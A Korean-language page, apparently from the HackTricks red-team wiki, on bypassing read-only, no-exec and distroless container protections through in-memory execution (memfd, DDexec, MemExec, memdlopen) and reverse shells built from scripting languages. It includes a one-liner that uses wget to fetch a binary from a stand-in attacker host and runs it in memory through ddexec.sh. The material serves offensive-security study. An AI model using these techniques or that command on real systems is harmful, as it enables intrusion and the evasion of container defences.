.. | ||
ddexec.md | ||
README.md |
FS 보호 우회: 읽기 전용 / 실행 금지 / Distroless
{% hint style="success" %}
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- 해킹 트릭을 공유하려면 HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하세요.
해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면 - 우리는 인재를 모집합니다! (유창한 폴란드어 필기 및 구사 필수).
{% embed url="https://www.stmcyber.com/careers" %}
비디오
다음 비디오에서 이 페이지에 언급된 기술을 더 깊이 설명합니다:
읽기 전용 / 실행 금지 시나리오
리눅스 머신이 읽기 전용 (ro) 파일 시스템 보호로 마운트되는 경우가 점점 더 많아지고 있습니다. 특히 컨테이너에서 그렇습니다. 이는 ro 파일 시스템으로 컨테이너를 실행하는 것이 securitycontext
에서 **readOnlyRootFilesystem: true
**를 설정하는 것만큼 쉽기 때문입니다:
apiVersion: v1
kind: Pod
metadata:
name: alpine-pod
spec:
containers:
- name: alpine
image: alpine
securityContext:
readOnlyRootFilesystem: true
command: ["sh", "-c", "while true; do sleep 1000; done"]
그러나 파일 시스템이 ro로 마운트되더라도 **/dev/shm
**는 여전히 쓰기가 가능하므로 디스크에 아무것도 쓸 수 없다는 것은 잘못된 것입니다. 그러나 이 폴더는 실행 금지 보호로 마운트되므로 여기에서 바이너리를 다운로드하면 실행할 수 없습니다.
{% hint style="warning" %}
레드 팀 관점에서 볼 때, 이는 시스템에 이미 없는 바이너리(예: 백도어 또는 kubectl
과 같은 열거기)를 다운로드하고 실행하는 것을 복잡하게 만듭니다.
{% endhint %}
가장 쉬운 우회: 스크립트
바이너리를 언급했지만, 인터프리터가 머신 내부에 있는 한 어떤 스크립트도 실행할 수 있습니다. 예를 들어, sh
가 있는 경우 셸 스크립트를 실행하거나 python
이 설치된 경우 파이썬 스크립트를 실행할 수 있습니다.
그러나 이것만으로는 바이너리 백도어나 실행해야 할 다른 바이너리 도구를 실행하기에 충분하지 않습니다.
메모리 우회
바이너리를 실행하고 싶지만 파일 시스템이 이를 허용하지 않는 경우, 가장 좋은 방법은 메모리에서 실행하는 것입니다. 왜냐하면 보호가 적용되지 않기 때문입니다.
FD + exec 시스템 호출 우회
머신 내부에 Python, Perl, 또는 Ruby와 같은 강력한 스크립트 엔진이 있는 경우, 메모리에서 실행할 바이너리를 다운로드하고, 메모리 파일 설명자(create_memfd
시스템 호출)에 저장할 수 있습니다. 이는 이러한 보호에 의해 보호되지 않으며, 그런 다음 exec
시스템 호출을 호출하여 실행할 파일로 fd를 지정할 수 있습니다.
이를 위해 fileless-elf-exec 프로젝트를 쉽게 사용할 수 있습니다. 바이너리를 전달하면 바이너리가 압축되고 b64로 인코딩된 스크립트를 지정된 언어로 생성하며, fd를 생성하여 create_memfd
시스템 호출을 호출하고 이를 실행하기 위한 exec 시스템 호출을 포함하는 지침이 포함됩니다.
{% hint style="warning" %}
이 방법은 PHP나 Node와 같은 다른 스크립팅 언어에서는 작동하지 않습니다. 왜냐하면 스크립트에서 원시 시스템 호출을 호출하는 기본 방법이 없기 때문입니다. 따라서 바이너리를 저장할 메모리 fd를 생성하기 위해 create_memfd
를 호출할 수 없습니다.
또한, /dev/shm
에 있는 파일로 정상 fd를 생성하는 것은 작동하지 않습니다. 왜냐하면 실행 금지 보호가 적용되기 때문에 실행할 수 없기 때문입니다.
{% endhint %}
DDexec / EverythingExec
DDexec / EverythingExec 기술은 자신의 프로세스 메모리를 수정하여 **/proc/self/mem
**을 덮어쓸 수 있게 해줍니다.
따라서 프로세스에서 실행되는 어셈블리 코드를 제어함으로써, 셸코드를 작성하고 프로세스를 "변형"하여 임의의 코드를 실행할 수 있습니다.
{% hint style="success" %} DDexec / EverythingExec를 사용하면 메모리에서 자신의 셸코드 또는 어떤 바이너리를 로드하고 실행할 수 있습니다. {% endhint %}
# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
더 많은 정보는 이 기술에 대해 Github를 확인하거나:
{% content-ref url="ddexec.md" %} ddexec.md {% endcontent-ref %}
MemExec
Memexec는 DDexec의 자연스러운 다음 단계입니다. 다른 바이너리를 실행하고 싶을 때마다 DDexec를 다시 시작할 필요 없이, DDexec 기술을 통해 memexec 셸코드를 실행하고 이 데몬과 통신하여 새 바이너리를 로드하고 실행할 수 있습니다.
memexec를 사용하여 PHP 리버스 셸에서 바이너리를 실행하는 방법에 대한 예시는 https://github.com/arget13/memexec/blob/main/a.php에서 확인할 수 있습니다.
Memdlopen
DDexec와 유사한 목적을 가진 memdlopen 기술은 메모리에 바이너리를 로드하는 더 쉬운 방법을 제공합니다. 이는 의존성이 있는 바이너리도 로드할 수 있게 해줄 수 있습니다.
Distroless Bypass
Distroless란 무엇인가
Distroless 컨테이너는 특정 애플리케이션이나 서비스 실행에 필요한 최소한의 구성 요소만 포함하고 있으며, 패키지 관리자, 셸 또는 시스템 유틸리티와 같은 더 큰 구성 요소는 제외합니다.
Distroless 컨테이너의 목표는 불필요한 구성 요소를 제거하여 컨테이너의 공격 표면을 줄이고 악용될 수 있는 취약점의 수를 최소화하는 것입니다.
리버스 셸
Distroless 컨테이너에서는 정상적인 셸을 얻기 위해 sh
또는 bash
를 찾을 수 없을 수도 있습니다. ls
, whoami
, id
와 같은 바이너리도 찾을 수 없습니다... 시스템에서 일반적으로 실행하는 모든 것입니다.
{% hint style="warning" %} 따라서, 리버스 셸을 얻거나 시스템을 열거할 수 없습니다. {% endhint %}
그러나 손상된 컨테이너가 예를 들어 플라스크 웹을 실행하고 있다면, 파이썬이 설치되어 있으므로 파이썬 리버스 셸을 얻을 수 있습니다. 노드를 실행하고 있다면 노드 리버스 셸을 얻을 수 있으며, 대부분의 스크립팅 언어와 마찬가지입니다.
{% hint style="success" %} 스크립팅 언어를 사용하여 언어의 기능을 활용하여 시스템을 열거할 수 있습니다. {% endhint %}
읽기 전용/실행 금지 보호가 없다면, 리버스 셸을 악용하여 파일 시스템에 바이너리를 작성하고 실행할 수 있습니다.
{% hint style="success" %} 그러나 이러한 종류의 컨테이너에서는 이러한 보호가 일반적으로 존재하지만, 이전 메모리 실행 기술을 사용하여 우회할 수 있습니다. {% endhint %}
RCE 취약점을 악용하여 스크립팅 언어의 리버스 셸을 얻고 메모리에서 바이너리를 실행하는 방법에 대한 예시는 https://github.com/carlospolop/DistrolessRCE에서 확인할 수 있습니다.
해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면 - 우리는 인재를 모집합니다! (유창한 폴란드어 필기 및 구사 필수).
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
AWS 해킹 배우고 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우고 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks와 HackTricks Cloud github 리포지토리에 PR을 제출하여 해킹 팁을 공유하세요.